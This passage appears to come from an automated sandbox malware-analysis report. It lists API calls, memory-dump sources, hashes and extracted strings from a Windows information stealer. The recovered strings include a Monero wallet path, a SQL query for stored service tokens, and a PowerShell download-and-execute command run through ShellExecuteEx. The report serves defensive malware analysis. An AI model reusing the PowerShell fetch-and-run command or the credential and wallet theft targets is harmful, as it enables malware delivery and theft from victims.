                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: Password
                      • API String ID: 2808661185-3434357891
                      • Opcode ID: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                      • Instruction ID: 1d8d2ea39a9085014b83ecbf02f6b577c8face05f7648f10d8425b6f276a5ee8
                      • Opcode Fuzzy Hash: 983efe550947f7bd7b6706bea103f31df3699e89ecde1e6c3ca32747da8ec2cb
                      • Instruction Fuzzy Hash: 6B611EB59142589BDB24DB50CC95FDAB7B8BF64300F0081E9E689A6181DFB09FC9CF91
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,00E3E4A8,00000000,?,001E0E2C,00000000,?,00000000), ref: 001D8130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D8137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 001D8158
                      • wsprintfA.USER32 ref: 001D81AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@$h
                      • API String ID: 2922868504-3650706056
                      • Opcode ID: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                      • Instruction ID: 5a04cefcc117879435696b5368a088aff9f5374cf944092c52156367cf6930c6
                      • Opcode Fuzzy Hash: 260e3d115d29cb3b08f6e6237d07c5aa3b3480db3889253087d6be010c814b10
                      • Instruction Fuzzy Hash: 88214AB1E44318ABDB04DFD4DD49FAEB7B8FB44B00F10461AF605BB280C77869058BA9
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D76A4
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D76AB
                      • RegOpenKeyExA.ADVAPI32(80000002,00E2C428,00000000,00020119,00000000), ref: 001D76DD
                      • RegQueryValueExA.ADVAPI32(00000000,00E3E430,00000000,00000000,?,000000FF), ref: 001D76FE
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D7708
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: 0$Windows 11
                      • API String ID: 3225020163-921549449
                      • Opcode ID: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                      • Instruction ID: 800dc35e8be4a57a678a3c17a0700132c38095da6ed6e6e8b8c66492a4a47d54
                      • Opcode Fuzzy Hash: d28db8bf3ece67f8792c40fe3cbc7fad327e60e7b4508b4bc466b2b511e8a0d8
                      • Instruction Fuzzy Hash: A80162B5A04304BBE700EBE4DE4DF6EB7B8EB48701F108465FA04E72D1E77099148B55
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      • lstrlen.KERNEL32(00000000), ref: 001CBC9F
                        • Part of subcall function 001D8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 001D8E52
                      • StrStrA.SHLWAPI(00000000,AccountId), ref: 001CBCCD
                      • lstrlen.KERNEL32(00000000), ref: 001CBDA5
                      • lstrlen.KERNEL32(00000000), ref: 001CBDB9
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                      • API String ID: 3073930149-1079375795
                      • Opcode ID: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                      • Instruction ID: d909545cdd75544b749e00abdb7bb243a16dea49dbfcec92b9c42b72b5f73d7b
                      • Opcode Fuzzy Hash: c0889f62681aaf87e5458e4c932d0308e57dd001dc17f928661dd585d6ece3ab
                      • Instruction Fuzzy Hash: 18B15571910158ABDF04FBA0CD96EEE7338AF64301F804569F506B3291EF346E49DBA6
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: ExitProcess$DefaultLangUser
                      • String ID: *
                      • API String ID: 1494266314-163128923
                      • Opcode ID: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
                      • Instruction ID: f3d1579eb177c81c0adeaff34cb6aaccbe709001630ba7782be5a8375e53862b
                      • Opcode Fuzzy Hash: 03dde7e81fec5d96dc8fd7c22c12825b73de995d2d965908f4efaeec7a897302
                      • Instruction Fuzzy Hash: 57F05E31904309EFD344AFE4EA0976C7B70FB04703F1481A9E609A72D1D6708B61AB9A
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 001C4FCA
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C4FD1
                      • InternetOpenA.WININET(001E0DDF,00000000,00000000,00000000,00000000), ref: 001C4FEA
                      • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 001C5011
                      • InternetReadFile.WININET(?,?,00000400,00000000), ref: 001C5041
                      • InternetCloseHandle.WININET(?), ref: 001C50B9
                      • InternetCloseHandle.WININET(?), ref: 001C50C6
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                      • String ID:
                      • API String ID: 3066467675-0
                      • Opcode ID: ac73325dc9e3ca7a0a25054b7c2bf81fd574e7e8dbf3036bb26aa0ba2030a156
                      • Instruction ID: 360135bc4005cd6c2652b86ddcde4d087c4f555a6a105060d8bbe2aa1c31b5cf
                      • Opcode Fuzzy Hash: ac73325dc9e3ca7a0a25054b7c2bf81fd574e7e8dbf3036bb26aa0ba2030a156
                      • Instruction Fuzzy Hash: BA3107B4A00218ABDB20CF54DD85BDCB7B4EB48704F5081E9FA09B7281D770AAD58F99
                      APIs
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 001D8426
                      • wsprintfA.USER32 ref: 001D8459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 001D847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D8499
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                      • RegQueryValueExA.ADVAPI32(00000000,00E3E418,00000000,000F003F,?,00000400), ref: 001D84EC
                      • lstrlen.KERNEL32(?), ref: 001D8501
                      • RegQueryValueExA.ADVAPI32(00000000,00E3E520,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,001E0B34), ref: 001D8599
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D8608
                      • RegCloseKey.ADVAPI32(00000000), ref: 001D861A
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                      • String ID: %s\%s
                      • API String ID: 3896182533-4073750446
                      • Opcode ID: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                      • Instruction ID: 644812412495ec1b8ee9654cc7ee1b682ac3ca6b5807784dbf730adb53137d5a
                      • Opcode Fuzzy Hash: f690d10e40afc990f21f0a8380dffa10f0d08c11ec7d2813bcd27caa3d265a1a
                      • Instruction Fuzzy Hash: FE21FA7191022CABDB24DB54DD85FE9B3B8FB48714F00C5E9E609A6240DF71AA85CFD4
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7734
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D773B
                      • RegOpenKeyExA.ADVAPI32(80000002,00E2C428,00000000,00020119,001D76B9), ref: 001D775B
                      • RegQueryValueExA.ADVAPI32(001D76B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 001D777A
                      • RegCloseKey.ADVAPI32(001D76B9), ref: 001D7784
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID: CurrentBuildNumber
                      • API String ID: 3225020163-1022791448
                      • Opcode ID: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                      • Instruction ID: db1956f9125e57dbbefbccf63524a48afe470104e509e3a18180207ad3c7a605
                      • Opcode Fuzzy Hash: 2c83542f12493a4d15a9de67c708cbc65f4b9558fcc52d5dd26af9dc36043071
                      • Instruction Fuzzy Hash: CD0167B5A40308BBD700EBE4DD49FAEB7B8EB48704F008565FA05B7281D77095508B55
                      APIs
                      • memset.MSVCRT ref: 001D40D5
                      • RegOpenKeyExA.ADVAPI32(80000001,00E3DB60,00000000,00020119,?), ref: 001D40F4
                      • RegQueryValueExA.ADVAPI32(?,00E3DE60,00000000,00000000,00000000,000000FF), ref: 001D4118
                      • RegCloseKey.ADVAPI32(?), ref: 001D4122
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4147
                      • lstrcat.KERNEL32(?,00E3DE00), ref: 001D415B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrcat$CloseOpenQueryValuememset
                      • String ID:
                      • API String ID: 2623679115-0
                      • Opcode ID: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                      • Instruction ID: 325f48c3e0056e064c22550a0f46972eff33ec618103a0b55e09fef13b94d8c1
                      • Opcode Fuzzy Hash: d876b71550b92e9a3e21035f74021eb3e9de8e134b2bc3bfd7579abeb3e86f61
                      • Instruction Fuzzy Hash: B241C8B6D002086BDB14FBA0DD46FFE733DAB99300F00855DB61657181EB759B988BD2
                      APIs
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001C99EC
                      • GetFileSizeEx.KERNEL32(000000FF,?), ref: 001C9A11
                      • LocalAlloc.KERNEL32(00000040,?), ref: 001C9A31
                      • ReadFile.KERNEL32(000000FF,?,00000000,001C148F,00000000), ref: 001C9A5A
                      • LocalFree.KERNEL32(001C148F), ref: 001C9A90
                      • CloseHandle.KERNEL32(000000FF), ref: 001C9A9A
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                      • String ID:
                      • API String ID: 2311089104-0
                      • Opcode ID: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                      • Instruction ID: 23ee29a439452deddc37fc8a18274267333eacef90fbeab7e898fec627fc0b71
                      • Opcode Fuzzy Hash: 49ebdd001904660f343a289e51aec73dfeb067b364ecd035092b68485aaffc1c
                      • Instruction Fuzzy Hash: 363127B4A00209EFDB14CFA4C989FAE77B5FF58300F108158E902A7290D778EA51CFA1
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: String___crt$Typememset
                      • String ID:
                      • API String ID: 3530896902-3916222277
                      • Opcode ID: 0fb8ac3a25bff528bb6afd6388b60acfe202cc78b10dbf2a04dd6a42328e0659
                      • Instruction ID: 89187ce0524148e2668dff3509750b2aaa8599a50795446883aef609c9e635bc
                      • Opcode Fuzzy Hash: 0fb8ac3a25bff528bb6afd6388b60acfe202cc78b10dbf2a04dd6a42328e0659
                      • Instruction Fuzzy Hash: C44127B150079D5EDB258B24CD94FFBBBE89F05708F1448E9E98A86282D3719A44DFA0
                      APIs
                      • lstrcat.KERNEL32(?,00E3DF68), ref: 001D47DB
                        • Part of subcall function 001D8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 001D8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 001D4801
                      • lstrcat.KERNEL32(?,?), ref: 001D4820
                      • lstrcat.KERNEL32(?,?), ref: 001D4834
                      • lstrcat.KERNEL32(?,00E2BAC0), ref: 001D4847
                      • lstrcat.KERNEL32(?,?), ref: 001D485B
                      • lstrcat.KERNEL32(?,00E3DBC0), ref: 001D486F
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001D8D90: GetFileAttributesA.KERNEL32(00000000,?,001C1B54,?,?,001E564C,?,?,001E0E1F), ref: 001D8D9F
                        • Part of subcall function 001D4570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 001D4580
                        • Part of subcall function 001D4570: RtlAllocateHeap.NTDLL(00000000), ref: 001D4587
                        • Part of subcall function 001D4570: wsprintfA.USER32 ref: 001D45A6
                        • Part of subcall function 001D4570: FindFirstFileA.KERNEL32(?,?), ref: 001D45BD
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
                      • String ID:
                      • API String ID: 2540262943-0
                      • Opcode ID: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                      • Instruction ID: d86644bf480a9504559304edaf4c58deb2fb066a0193b420dae22adb1aee1610
                      • Opcode Fuzzy Hash: 39441d077660da5f5ead80a07f104a0802569cf020adc6eb4ae92ace270dd8c6
                      • Instruction Fuzzy Hash: 4831A2B6900308A7CB14FBB0DC85EED737CAB68300F40459AB359A6181EF70D789CB96
                      APIs
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                      • ShellExecuteEx.SHELL32(0000003C), ref: 001D2D85
                      Strings
                      • -nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001D2CC4
                      • ')", xrefs: 001D2CB3
                      • <, xrefs: 001D2D39
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 001D2D04
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
                      • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      • API String ID: 3031569214-898575020
                      • Opcode ID: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                      • Instruction ID: f14373497f0ed7b2045fe34b72baa4f0a503aa8e4b807507772bb5e7e50ce7b3
                      • Opcode Fuzzy Hash: 28fb27328af6f5e1452f2cd63c2490b6dda03466b7ff163bf253588700af7174
                      • Instruction Fuzzy Hash: 26410271C502589ADB18FFA0C892BEDB774AF24300F80412AF416B7291EF742A4ADF95
                      APIs
                      • LocalAlloc.KERNEL32(00000040,?), ref: 001C9F41
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpy$AllocLocal
                      • String ID: @$ERROR_RUN_EXTRACTOR$v10$v20
                      • API String ID: 4171519190-1096346117
                      • Opcode ID: ac5c9ebb1db4f21ea05ef886d4a89a861e740bac3ac67dc316b03a1bd60925f8
                      • Instruction ID: d7c7d85321c7e0ea8d25860a9f8a43d870a2bae6cbece0b09f7e3c920a4e8a0d
                      • Opcode Fuzzy Hash: ac5c9ebb1db4f21ea05ef886d4a89a861e740bac3ac67dc316b03a1bd60925f8
                      • Instruction Fuzzy Hash: C8616070A5024CEBDB24EFA4CC96FED7775AF65344F408018F90A9F281DBB4AA45CB52
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 001D7E37
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001D7E3E
                      • RegOpenKeyExA.ADVAPI32(80000002,00E2C5B0,00000000,00020119,?), ref: 001D7E5E
                      • RegQueryValueExA.ADVAPI32(?,00E3DA60,00000000,00000000,000000FF,000000FF), ref: 001D7E7F
                      • RegCloseKey.ADVAPI32(?), ref: 001D7E92
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                      • String ID:
                      • API String ID: 3225020163-0
                      • Opcode ID: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                      • Instruction ID: 4bc10193eca4f233887b4dac9e5cb9ab0a3ef1d14299b8f3812daaaa613f79e0
                      • Opcode Fuzzy Hash: ef284aff2d569c0a7ad51919b3e232aba413d52306dbd0c4d037f8b9e751b40b
                      • Instruction Fuzzy Hash: DA1151B2A44305EBD704DF94DE49F7FBBB8EB44710F10816AF605A7280D77458108BA1
                      APIs
                      • StrStrA.SHLWAPI(00E3DEC0,?,?,?,001D140C,?,00E3DEC0,00000000), ref: 001D926C
                      • lstrcpyn.KERNEL32(0040AB88,00E3DEC0,00E3DEC0,?,001D140C,?,00E3DEC0), ref: 001D9290
                      • lstrlen.KERNEL32(?,?,001D140C,?,00E3DEC0), ref: 001D92A7
                      • wsprintfA.USER32 ref: 001D92C7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpynlstrlenwsprintf
                      • String ID: %s%s
                      • API String ID: 1206339513-3252725368
                      • Opcode ID: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                      • Instruction ID: 17cf87003cb6de997d4fa22f5fbb02821d962f52197602027b91bd7d6d0bf984
                      • Opcode Fuzzy Hash: 0636a8665bae7fa4c9d1120187329a0f9c2c522becdce240a420428948bf6b2c
                      • Instruction Fuzzy Hash: E0010875500208FFCB04DFECC988EAE7BB9EB48350F108158F909AB240C775AA60DB96
                      APIs
